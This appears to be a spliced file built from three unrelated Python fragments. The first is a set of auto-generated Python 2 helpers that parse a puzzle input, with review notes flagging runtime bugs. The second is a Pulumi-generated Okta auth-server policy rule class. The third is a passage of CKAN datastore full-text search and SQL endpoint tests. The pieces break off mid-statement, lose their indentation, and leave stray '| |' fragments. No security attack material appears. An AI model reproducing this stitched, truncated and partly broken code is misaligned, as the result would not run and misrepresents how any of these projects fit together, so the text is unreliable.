def func_1a7f14da77a447acbd515901f41fc06a(infile):
    """
    Parse the four-integer "W L U G" case header from *infile* and return
    W, the total width of the region.
    """
    W, L, U, G = [int(tok) for tok in infile.readline().split()]
    return W
def func_c2f97cad34ff4d66b9798e2842ac939a():
    """Return a fresh, empty 'upper' vertex list."""
    return []
def func_a88ffd3e0f5c4f21b12d3c93bbd7351d():
    """Return a fresh, empty 'lower' vertex list."""
    return []
def func_c6eea036fc1b4389a7dee548c2920420(infile, lower, L):
    """
    Append L rows of whitespace-separated floats from *infile* to *lower*
    and return the last loop index (L - 1).

    NOTE(review): Python 2 code — uses xrange, and map(float, ...) yields
    a list only on Python 2.  Raises NameError when L == 0 because j is
    never bound.  The local 'upper' is created but unused.
    """
    upper = []
    for j in xrange(L):
        lower.append(map(float, infile.readline().split()))
    return j
def func_a0ae016003904ceaa29a2abbd9d28a8c(infile, lower, L):
    """
    Append L rows of whitespace-separated floats from *infile* to *lower*
    and return the (always empty) local 'upper' list.

    NOTE(review): Python 2 code — uses xrange, and map(float, ...) yields
    a list only on Python 2.
    """
    upper = []
    for j in xrange(L):
        lower.append(map(float, infile.readline().split()))
    return upper
def func_7eea82bcad1e432a965314393d14ebd3(upper, infile, U, lower, L):
    """
    Read L float rows into *lower*, then U float rows into *upper*, and
    return the last loop index used (j is reused by both loops, so this is
    U - 1 when U > 0, else L - 1).

    NOTE(review): Python 2 code — uses xrange and list-returning map.
    Raises NameError when both L and U are 0 (j never bound).
    """
    for j in xrange(L):
        lower.append(map(float, infile.readline().split()))
    for j in xrange(U):
        upper.append(map(float, infile.readline().split()))
    return j
def func_905603ec298b4ae29616d69552bf423d(upper, infile, U, lower, G):
    """
    Read U float rows from *infile* into *upper*, invoke
    get_cuts(lower, upper, G) (its result is bound to an unused local),
    and return the last loop index (U - 1).

    NOTE(review): Python 2 code (xrange, list-returning map); get_cuts is
    defined elsewhere in the project.  Raises NameError when U == 0.
    """
    for j in xrange(U):
        upper.append(map(float, infile.readline().split()))
    result = get_cuts(lower, upper, G)
    return j
def func_56f5b2de7ad4417c88b4a769128d9947(upper, infile, U, lower, G):
    """
    Read U float rows from *infile* into *upper*, then return the result
    of get_cuts(lower, upper, G).

    NOTE(review): Python 2 code (xrange, list-returning map); get_cuts is
    defined elsewhere in the project.
    """
    for j in xrange(U):
        upper.append(map(float, infile.readline().split()))
    result = get_cuts(lower, upper, G)
    return result
def func_fb1d70d62b8e4427805275234a248016(upper, lower, i, G):
    """
    Call get_cuts(lower, upper, G) and immediately call its return value
    with a 'Case #%d:' label string.

    NOTE(review): this looks broken — get_cuts elsewhere in this file's
    lineage returns a list, which is not callable, so this raises
    TypeError at runtime.  Appears to be an auto-generated mutation of
    "print 'Case #%d:' ..." code; confirm intent before use.  get_cuts is
    defined elsewhere in the project.
    """
    result = get_cuts(lower, upper, G)('Case #%d:' % (i + 1,))
    return result
def func_dd3a4292bd1b40d69d778d2080829a67(infile):
    """
    Consume the four-integer "W L U G" case header from *infile* and
    return G, the requested number of equal-area groups.
    """
    W, L, U, G = [int(tok) for tok in infile.readline().split()]
    return G
def func_2d7990088bb4499db82d212b5ad32963(infile):
W, L, U, G = map(int, infile.readline().split())
lower = []
upper = | |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ServerPolicyRuleArgs', 'ServerPolicyRule']
@pulumi.input_type
class ServerPolicyRuleArgs:
    """Input arguments for constructing a ``ServerPolicyRule`` resource.

    Generated by the Pulumi Terraform Bridge (tfgen) -- see the file
    header warning; do not hand-edit the generated logic.  Required
    inputs: ``auth_server_id``, ``grant_type_whitelists``, ``policy_id``
    and ``priority``; all other inputs are optional and only recorded
    when a non-``None`` value is supplied.
    """
    def __init__(__self__, *,
                 auth_server_id: pulumi.Input[str],
                 grant_type_whitelists: pulumi.Input[Sequence[pulumi.Input[str]]],
                 policy_id: pulumi.Input[str],
                 priority: pulumi.Input[int],
                 access_token_lifetime_minutes: Optional[pulumi.Input[int]] = None,
                 group_blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 group_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 inline_hook_id: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 refresh_token_lifetime_minutes: Optional[pulumi.Input[int]] = None,
                 refresh_token_window_minutes: Optional[pulumi.Input[int]] = None,
                 scope_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 user_blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 user_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        The set of arguments for constructing a ServerPolicyRule resource.
        :param pulumi.Input[str] auth_server_id: Auth Server ID.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] grant_type_whitelists: Accepted grant type values, `"authorization_code"`, `"implicit"`, `"password"` or `"client_credentials"`. For `"implicit"` value either `user_whitelist` or `group_whitelist` should be set.
        :param pulumi.Input[str] policy_id: Auth Server Policy ID.
        :param pulumi.Input[int] priority: Priority of the auth server policy rule.
        :param pulumi.Input[int] access_token_lifetime_minutes: Lifetime of access token. Can be set to a value between 5 and 1440 minutes.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] group_blacklists: Specifies a set of Groups whose Users are to be excluded.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] group_whitelists: Specifies a set of Groups whose Users are to be included. Can be set to Group ID or to the following: "EVERYONE".
        :param pulumi.Input[str] inline_hook_id: The ID of the inline token to trigger.
        :param pulumi.Input[str] name: Auth Server Policy Rule name.
        :param pulumi.Input[int] refresh_token_lifetime_minutes: Lifetime of refresh token.
        :param pulumi.Input[int] refresh_token_window_minutes: Window in which a refresh token can be used. It can be a value between 5 and 2628000 (5 years) minutes.
               `"refresh_token_window_minutes"` must be between `"access_token_lifetime_minutes"` and `"refresh_token_lifetime_minutes"`.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] scope_whitelists: Scopes allowed for this policy rule. They can be whitelisted by name or all can be whitelisted with `"*"`.
        :param pulumi.Input[str] status: The status of the Auth Server Policy Rule.
        :param pulumi.Input[str] type: The type of the Auth Server Policy Rule.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] user_blacklists: Specifies a set of Users to be excluded.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] user_whitelists: Specifies a set of Users to be included.
        """
        pulumi.set(__self__, "auth_server_id", auth_server_id)
        pulumi.set(__self__, "grant_type_whitelists", grant_type_whitelists)
        pulumi.set(__self__, "policy_id", policy_id)
        pulumi.set(__self__, "priority", priority)
        # Optional inputs are only recorded when explicitly provided.
        if access_token_lifetime_minutes is not None:
            pulumi.set(__self__, "access_token_lifetime_minutes", access_token_lifetime_minutes)
        if group_blacklists is not None:
            pulumi.set(__self__, "group_blacklists", group_blacklists)
        if group_whitelists is not None:
            pulumi.set(__self__, "group_whitelists", group_whitelists)
        if inline_hook_id is not None:
            pulumi.set(__self__, "inline_hook_id", inline_hook_id)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if refresh_token_lifetime_minutes is not None:
            pulumi.set(__self__, "refresh_token_lifetime_minutes", refresh_token_lifetime_minutes)
        if refresh_token_window_minutes is not None:
            pulumi.set(__self__, "refresh_token_window_minutes", refresh_token_window_minutes)
        if scope_whitelists is not None:
            pulumi.set(__self__, "scope_whitelists", scope_whitelists)
        if status is not None:
            pulumi.set(__self__, "status", status)
        if type is not None:
            pulumi.set(__self__, "type", type)
        if user_blacklists is not None:
            pulumi.set(__self__, "user_blacklists", user_blacklists)
        if user_whitelists is not None:
            pulumi.set(__self__, "user_whitelists", user_whitelists)
    @property
    @pulumi.getter(name="authServerId")
    def auth_server_id(self) -> pulumi.Input[str]:
        """
        Auth Server ID.
        """
        return pulumi.get(self, "auth_server_id")
    @auth_server_id.setter
    def auth_server_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "auth_server_id", value)
    @property
    @pulumi.getter(name="grantTypeWhitelists")
    def grant_type_whitelists(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        Accepted grant type values, `"authorization_code"`, `"implicit"`, `"password"` or `"client_credentials"`. For `"implicit"` value either `user_whitelist` or `group_whitelist` should be set.
        """
        return pulumi.get(self, "grant_type_whitelists")
    @grant_type_whitelists.setter
    def grant_type_whitelists(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "grant_type_whitelists", value)
    @property
    @pulumi.getter(name="policyId")
    def policy_id(self) -> pulumi.Input[str]:
        """
        Auth Server Policy ID.
        """
        return pulumi.get(self, "policy_id")
    @policy_id.setter
    def policy_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "policy_id", value)
    @property
    @pulumi.getter
    def priority(self) -> pulumi.Input[int]:
        """
        Priority of the auth server policy rule.
        """
        return pulumi.get(self, "priority")
    @priority.setter
    def priority(self, value: pulumi.Input[int]):
        pulumi.set(self, "priority", value)
    @property
    @pulumi.getter(name="accessTokenLifetimeMinutes")
    def access_token_lifetime_minutes(self) -> Optional[pulumi.Input[int]]:
        """
        Lifetime of access token. Can be set to a value between 5 and 1440 minutes.
        """
        return pulumi.get(self, "access_token_lifetime_minutes")
    @access_token_lifetime_minutes.setter
    def access_token_lifetime_minutes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "access_token_lifetime_minutes", value)
    @property
    @pulumi.getter(name="groupBlacklists")
    def group_blacklists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Specifies a set of Groups whose Users are to be excluded.
        """
        return pulumi.get(self, "group_blacklists")
    @group_blacklists.setter
    def group_blacklists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "group_blacklists", value)
    @property
    @pulumi.getter(name="groupWhitelists")
    def group_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Specifies a set of Groups whose Users are to be included. Can be set to Group ID or to the following: "EVERYONE".
        """
        return pulumi.get(self, "group_whitelists")
    @group_whitelists.setter
    def group_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "group_whitelists", value)
    @property
    @pulumi.getter(name="inlineHookId")
    def inline_hook_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the inline token to trigger.
        """
        return pulumi.get(self, "inline_hook_id")
    @inline_hook_id.setter
    def inline_hook_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "inline_hook_id", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Auth Server Policy Rule name.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="refreshTokenLifetimeMinutes")
    def refresh_token_lifetime_minutes(self) -> Optional[pulumi.Input[int]]:
        """
        Lifetime of refresh token.
        """
        return pulumi.get(self, "refresh_token_lifetime_minutes")
    @refresh_token_lifetime_minutes.setter
    def refresh_token_lifetime_minutes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "refresh_token_lifetime_minutes", value)
    @property
    @pulumi.getter(name="refreshTokenWindowMinutes")
    def refresh_token_window_minutes(self) -> Optional[pulumi.Input[int]]:
        """
        Window in which a refresh token can be used. It can be a value between 5 and 2628000 (5 years) minutes.
        `"refresh_token_window_minutes"` must be between `"access_token_lifetime_minutes"` and `"refresh_token_lifetime_minutes"`.
        """
        return pulumi.get(self, "refresh_token_window_minutes")
    @refresh_token_window_minutes.setter
    def refresh_token_window_minutes(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "refresh_token_window_minutes", value)
    @property
    @pulumi.getter(name="scopeWhitelists")
    def scope_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Scopes allowed for this policy rule. They can be whitelisted by name or all can be whitelisted with `"*"`.
        """
        return pulumi.get(self, "scope_whitelists")
    @scope_whitelists.setter
    def scope_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "scope_whitelists", value)
    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        The status of the Auth Server Policy Rule.
        """
        return pulumi.get(self, "status")
    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of the Auth Server Policy Rule.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="userBlacklists")
    def user_blacklists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Specifies a set of Users to be excluded.
        """
        return pulumi.get(self, "user_blacklists")
    @user_blacklists.setter
    def user_blacklists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "user_blacklists", value)
    @property
    @pulumi.getter(name="userWhitelists")
    def user_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Specifies a set of Users to be included.
        """
        return pulumi.get(self, "user_whitelists")
    @user_whitelists.setter
    def user_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "user_whitelists", value)
@pulumi.input_type
class _ServerPolicyRuleState:
def __init__(__self__, *,
access_token_lifetime_minutes: Optional[pulumi.Input[int]] = None,
auth_server_id: Optional[pulumi.Input[str]] = None,
grant_type_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
group_blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
group_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
inline_hook_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
policy_id: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
refresh_token_lifetime_minutes: Optional[pulumi.Input[int]] = None,
refresh_token_window_minutes: Optional[pulumi.Input[int]] = None,
scope_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
status: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
user_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering ServerPolicyRule resources.
:param pulumi.Input[int] access_token_lifetime_minutes: Lifetime of access token. Can be set to a value between 5 and 1440 minutes.
:param pulumi.Input[str] auth_server_id: Auth Server ID.
:param pulumi.Input[Sequence[pulumi.Input[str]]] grant_type_whitelists: Accepted grant type values, `"authorization_code"`, `"implicit"`, `"password"` or `"client_credentials"`. For `"implicit"` value either `user_whitelist` or `group_whitelist` should be set.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_blacklists: Specifies a set of Groups whose Users are to be excluded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_whitelists: Specifies a set of Groups whose Users are to be included. Can be set to Group ID or to the following: "EVERYONE".
:param pulumi.Input[str] inline_hook_id: The ID of the inline token to trigger.
:param pulumi.Input[str] name: Auth Server Policy Rule name.
:param pulumi.Input[str] policy_id: Auth Server Policy ID.
:param pulumi.Input[int] priority: Priority of the auth server policy rule.
:param pulumi.Input[int] refresh_token_lifetime_minutes: Lifetime of refresh token.
:param pulumi.Input[int] refresh_token_window_minutes: Window in which a refresh token can be used. It can be a value between 5 and 2628000 (5 years) minutes.
`"refresh_token_window_minutes"` must be between `"access_token_lifetime_minutes"` and `"refresh_token_lifetime_minutes"`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_whitelists: Scopes allowed for this policy rule. They can be whitelisted by name or all can be whitelisted with `"*"`.
:param pulumi.Input[str] status: The status of the Auth Server Policy Rule.
:param pulumi.Input[str] type: The type of the Auth Server Policy Rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] user_blacklists: Specifies a set of Users to be excluded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] user_whitelists: Specifies a set of Users to be included.
"""
if access_token_lifetime_minutes is not None:
pulumi.set(__self__, "access_token_lifetime_minutes", access_token_lifetime_minutes)
if auth_server_id is not None:
pulumi.set(__self__, "auth_server_id", auth_server_id)
if grant_type_whitelists is not None:
pulumi.set(__self__, "grant_type_whitelists", grant_type_whitelists)
if group_blacklists is not None:
pulumi.set(__self__, "group_blacklists", group_blacklists)
if group_whitelists is not None:
pulumi.set(__self__, "group_whitelists", group_whitelists)
if | |
u"author",
u"b\xfck",
u"nested",
u"published",
u"characters",
u"rating with %",
],
)
]
assert results == [self.expected_records[0]], results["records"]
for field in expected_fields:
assert field in result["fields"], field
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_on_specific_column(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {u"b\xfck": "annakarenina"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
assert len(res_dict["result"]["records"]) == 1
assert (
res_dict["result"]["records"][0]["_id"]
== self.expected_records[0]["_id"]
)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_on_specific_column_even_if_q_is_a_json_string(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"q": u'{"b\xfck": "annakarenina"}',
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
assert len(res_dict["result"]["records"]) == 1
assert (
res_dict["result"]["records"][0]["_id"]
== self.expected_records[0]["_id"]
)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_invalid_field_name(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {"invalid_field_name": "value"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_invalid_field_value(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {"author": ["invalid", "value"]},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_table_metadata(self, app):
data = {"resource_id": "_table_metadata"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_filters_not_as_dict(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"filters": "the-filter",
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("filters") is not None, res_dict["error"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_invalid_filters(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"filters": {"invalid-column-name": "value"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("filters") is not None, res_dict["error"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_invalid_fields(self, app):
data = {
"resource_id": self.data["resource_id"],
"fields": ["invalid-column-name"],
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("fields") is not None, res_dict["error"]
class TestDatastoreFullTextSearchLegacyTests(object):
    """Legacy full-text-search tests over a six-row numeric/geo fixture.

    The fixture below seeds a datastore resource whose values (countries,
    titles with embedded numbers, dates, coordinates) are what the exact
    ``total`` counts in the tests refer to -- keep data and assertions in
    sync.
    """
    @pytest.fixture(autouse=True)
    def initial_data(self, clean_datastore, app):
        """Create the test resource and load the six fixture records."""
        ctd.CreateTestData.create()
        self.sysadmin_user = model.User.get("testsysadmin")
        self.normal_user = model.User.get("annafan")
        resource = model.Package.get("annakarenina").resources[0]
        self.data = dict(
            resource_id=resource.id,
            force=True,
            fields=[
                {"id": "id"},
                {"id": "date", "type": "date"},
                {"id": "x"},
                {"id": "y"},
                {"id": "z"},
                {"id": "country"},
                {"id": "title"},
                {"id": "lat"},
                {"id": "lon"},
            ],
            records=[
                {
                    "id": 0,
                    "date": "2011-01-01",
                    "x": 1,
                    "y": 2,
                    "z": 3,
                    "country": "DE",
                    "title": "first 99",
                    "lat": 52.56,
                    "lon": 13.40,
                },
                {
                    "id": 1,
                    "date": "2011-02-02",
                    "x": 2,
                    "y": 4,
                    "z": 24,
                    "country": "UK",
                    "title": "second",
                    "lat": 54.97,
                    "lon": -1.60,
                },
                {
                    "id": 2,
                    "date": "2011-03-03",
                    "x": 3,
                    "y": 6,
                    "z": 9,
                    "country": "US",
                    "title": "third",
                    "lat": 40.00,
                    "lon": -75.5,
                },
                {
                    "id": 3,
                    "date": "2011-04-04",
                    "x": 4,
                    "y": 8,
                    "z": 6,
                    "country": "UK",
                    "title": "fourth",
                    "lat": 57.27,
                    "lon": -6.20,
                },
                {
                    "id": 4,
                    "date": "2011-05-04",
                    "x": 5,
                    "y": 10,
                    "z": 15,
                    "country": "UK",
                    "title": "fifth",
                    "lat": 51.58,
                    "lon": 0,
                },
                {
                    "id": 5,
                    "date": "2011-06-02",
                    "x": 6,
                    "y": 12,
                    "z": 18,
                    "country": "DE",
                    "title": "sixth 53.56",
                    "lat": 51.04,
                    "lon": 7.9,
                },
            ],
        )
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_create", json=self.data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"] is True
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_search_full_text(self, app):
        """Plain full-text search for "DE" matches the two DE rows."""
        data = {"resource_id": self.data["resource_id"], "q": "DE"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 2
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_advanced_search_full_text(self, app):
        """With plain=False, the tsquery "DE | UK" matches the 2 DE + 3 UK rows."""
        data = {
            "resource_id": self.data["resource_id"],
            "plain": "False",
            "q": "DE | UK",
        }
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 5
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_integers_within_text_strings(self, app):
        """"99" matches only the title "first 99"."""
        data = {"resource_id": self.data["resource_id"], "q": "99"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 1
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_integers(self, app):
        """"4" matches the three rows containing the value 4 (x, y or id)."""
        data = {"resource_id": self.data["resource_id"], "q": "4"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 3
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_decimal_within_text_strings(self, app):
        """"53.56" matches only the title "sixth 53.56"."""
        data = {"resource_id": self.data["resource_id"], "q": "53.56"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 1
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_decimal(self, app):
        """"52.56" matches only the row whose lat is 52.56."""
        data = {"resource_id": self.data["resource_id"], "q": "52.56"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 1
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_date(self, app):
        """"2011-01-01" matches only the row with that date."""
        data = {"resource_id": self.data["resource_id"], "q": "2011-01-01"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 1
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_json_like_string_succeeds(self, app):
        """A JSON-looking query string must not break the search endpoint."""
        data = {"resource_id": self.data["resource_id"], "q": '"{}"'}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"]
class TestDatastoreSQLLegacyTests(object):
    """Legacy tests for the datastore_search_sql endpoint.

    Covers LIKE queries, self-joins, authorization on private resources,
    and denial of access to PostgreSQL system tables.  The exact
    ``expected_records`` values (including the stemmed ``'warandpeac'``
    full-text lexeme) must stay in sync with the fixture records.
    """
    sysadmin_user = None
    normal_user = None
    @pytest.fixture(autouse=True)
    def initial_data(self, clean_datastore, app):
        """Create the books resource, an organization, and expected results."""
        ctd.CreateTestData.create()
        self.sysadmin_user = model.User.get("testsysadmin")
        self.normal_user = model.User.get("annafan")
        self.dataset = model.Package.get("annakarenina")
        resource = self.dataset.resources[0]
        self.data = {
            "resource_id": resource.id,
            "force": True,
            "aliases": "books4",
            "fields": [
                {"id": u"b\xfck", "type": "text"},
                {"id": "author", "type": "text"},
                {"id": "published"},
            ],
            "records": [
                {
                    u"b\xfck": "annakarenina",
                    "author": "tolstoy",
                    "published": "2005-03-01",
                    "nested": ["b", {"moo": "moo"}],
                },
                {
                    u"b\xfck": "warandpeace",
                    "author": "tolstoy",
                    "nested": {"a": "b"},
                },
            ],
        }
        auth = {"Authorization": str(self.sysadmin_user.apikey)}
        res = app.post(
            "/api/action/datastore_create", json=self.data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"] is True
        # Make an organization, because private datasets must belong to one.
        self.organization = tests.call_action_api(
            app,
            "organization_create",
            name="test_org",
            apikey=self.sysadmin_user.apikey,
        )
        self.expected_records = [
            {
                u"_full_text": [
                    u"'annakarenina'",
                    u"'b'",
                    u"'moo'",
                    u"'tolstoy'",
                    u"'2005'",
                ],
                u"_id": 1,
                u"author": u"tolstoy",
                u"b\xfck": u"annakarenina",
                u"nested": [u"b", {u"moo": u"moo"}],
                u"published": u"2005-03-01T00:00:00",
            },
            {
                u"_full_text": [u"'tolstoy'", u"'warandpeac'", u"'b'"],
                u"_id": 2,
                u"author": u"tolstoy",
                u"b\xfck": u"warandpeace",
                u"nested": {u"a": u"b"},
                u"published": None,
            },
        ]
        self.expected_join_results = [
            {u"first": 1, u"second": 1},
            {u"first": 1, u"second": 2},
        ]
        engine = db.get_write_engine()
        self.Session = orm.scoped_session(orm.sessionmaker(bind=engine))
    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_select_where_like_with_percent(self, app):
        """A LIKE pattern containing % returns both records, field-for-field."""
        query = 'SELECT * FROM public."{0}" WHERE "author" LIKE \'tol%\''.format(
            self.data["resource_id"]
        )
        data = {"sql": query}
        auth = {"Authorization": str(self.sysadmin_user.apikey)}
        res = app.post(
            "/api/action/datastore_search_sql", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"] is True
        result = res_dict["result"]
